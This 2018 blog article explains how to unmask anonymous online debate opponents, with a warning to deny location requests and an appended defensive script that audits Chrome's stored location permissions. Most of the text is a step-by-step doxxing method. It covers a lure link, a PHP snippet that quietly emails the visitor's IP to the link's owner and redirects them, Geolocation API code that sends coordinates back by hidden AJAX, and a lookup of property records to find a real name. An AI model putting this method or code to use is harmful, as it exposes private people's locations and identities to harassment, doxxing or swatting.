Geolocation `Attack`: Entrapping your anonymous opponent online

How to misuse the Geolocation API to strip your online opponent’s anonymity. And, how to save yourself from it.

Google Chrome: Consent Popup frequently seen for websites requesting your real location

Someone giving you a hard time during a discussion online? What if you could find out where that commenter is, or who they are?

But also, look at this the other way — what if they could trick you into revealing your real location and name?

That is one of the ways the HTML5 Geolocation API, used by many websites today to ‘know your location’, can be misused.

If you are not familiar with Geolocation, head right over to W3Schools.

But anyway, the actual “attack” is pretty straightforward and requires a bit of social engineering. When finding yourself caught up in a heated debate about hot button issues — whether on Reddit, Medium or anywhere, you would want to say something like “Look here http://your-website.tld/some/page. The statistics don’t lie. You’ll see my point… blah blah blah”.

Credit: https://medium.com/@benjaminsledge/honest-thoughts-from-a-veteran-about-gun-control-and-mental-health-c74930488e28

FYI, the get_geolocation link above is fictitious — I’m trying to show you I could create one on my website and then have you redirect to the actual page that proves some of my claims.

Chances are high that, if you are debating with someone who is seriously intellectual and not just trolling, they’ll click on the link out of curiosity.

This is where the magic happens.

The link should lead them to a page controlled by you. At the very least, a single line of server-side code will reveal their IP address:

<?php
// Email me their IP
mail("me@my.email", "Opponent's IP", "IP is: " . $_SERVER['REMOTE_ADDR']);
// Redirect them to the actual page
header("Location: http://redirect/to/the/actual/page");
?>

To make it look more legitimate, you can redirect the user to the actual URL which loads the resource that supports your argument. If you don’t do this, a blank page will either raise suspicion or enrage the “opponent”. They’ll likely call you an “idiot” for posting a dead link.

There are other ways to retrieve the IP address of a visitor too. Note that this applies to anyone who clicks your link, not just this visitor, so don’t be so confident that the IP you get is this user’s alone, unless you were going back and forth with only one person in a heated debate.

You can then use an IP tracer or a simple API to reveal the city and country where the IP, and hence the user, is likely based. This won’t work well if the user is on an anonymous VPN, for obvious reasons.

So, why not also inject client-side JavaScript code on the page which asks the user for their location? The HTML5 Geolocation API, rather than relying on the IP address alone, leverages several data points (such as Wi-Fi SSIDs, GPS, etc.) which can accurately identify the user’s location.

Credit: https://www.w3schools.com/html/html5_geolocation.asp

If they are careless, they may just click ‘Allow’ to dismiss the popup, not giving it a second thought. Then after a few seconds, once you retrieve the coordinates, you could have your page send them to your server using a sleek AJAX request, behind the scenes, and then have your page redirect the user to the actual resource related to your argument. Simple enough and gets you the exact coordinates of the user.

If they live in a big enough house, you’ll likely know exactly where they are. Take it a step further and public records, such as county property and deed records, will even reveal their real name!

Beware though, the same social engineering tactic can very well be used against you. No one likes to be doxxed or SWATted, so read this piece as mere weekend entertainment and as a way to safeguard yourself, instead of getting adventurous.

Next time you see a website requesting your consent for your location, unless it has a good enough reason to, it is best to click “Deny”.
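To check which sites you have already clicked ‘Allow’ for, here is an added example (not part of the original article) that lists the stored geolocation decisions in a parsed Chrome profile. The Preferences layout it reads, the setting codes and the timestamp format are assumptions about Chrome's on-disk format, and the sample data is constructed.

```javascript
// Added example: list stored geolocation decisions from a Chrome profile.
// Assumed layout (not from the article): the profile's "Preferences" JSON keeps
// them under profile.content_settings.exceptions.geolocation, keyed by
// "origin,embedder", with setting 1 = allow, 2 = block, and last_modified in
// microseconds since 1601-01-01 UTC.
const DECISION = { 1: "allow", 2: "block" };
const EPOCH_OFFSET_MS = 11644473600000; // 1601-01-01 to 1970-01-01

function chromeTimeToIso(ts) {
  if (!ts || !/^\d+$/.test(String(ts))) return null;
  // BigInt: the microsecond count exceeds Number.MAX_SAFE_INTEGER.
  const ms = Number(BigInt(ts) / 1000n) - EPOCH_OFFSET_MS;
  return new Date(ms).toISOString();
}

function auditGeolocation(prefs) {
  const stored = prefs?.profile?.content_settings?.exceptions?.geolocation ?? {};
  return Object.entries(stored)
    .map(([pattern, value]) => ({
      origin: pattern.split(",")[0],
      decision: DECISION[value?.setting] ?? "ask",
      decidedAt: chromeTimeToIso(value?.last_modified),
    }))
    .sort((a, b) => a.origin.localeCompare(b.origin));
}

function grantedOrigins(prefs) {
  return auditGeolocation(prefs)
    .filter((e) => e.decision === "allow")
    .map((e) => e.origin);
}

// Constructed sample data, not taken from a real profile.
const samplePrefs = { profile: { content_settings: { exceptions: { geolocation: {
  "https://maps.example:443,*": { setting: 1, last_modified: "13164336000000000" },
  "https://stats.example:443,*": { setting: 1, last_modified: "13164336000000000" },
  "https://news.example:443,*": { setting: 2 },
} } } } };

for (const e of auditGeolocation(samplePrefs)) {
  console.log(`${e.decision.padEnd(5)} ${e.origin} ${e.decidedAt ?? "-"}`);
}
```

Any origin listed as allow that you do not recognise can be revoked in Chrome's site settings under Location.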

Credit: Google Maps

Stuff my lawyers make me say…
Disclaimer: This article is meant for educational and entertainment purposes only. My intention is for you to safeguard yourself and think twice before revealing your location to apps and any website requesting it. Do not violate any laws in your area and respect the privacy of others, much as you’d prefer yours to be respected. I will not be responsible if you get yourself in trouble, break any laws or infringe on the privacy of another person.

© 2018. Akshay ‘Ax’ Sharma. All Rights Reserved.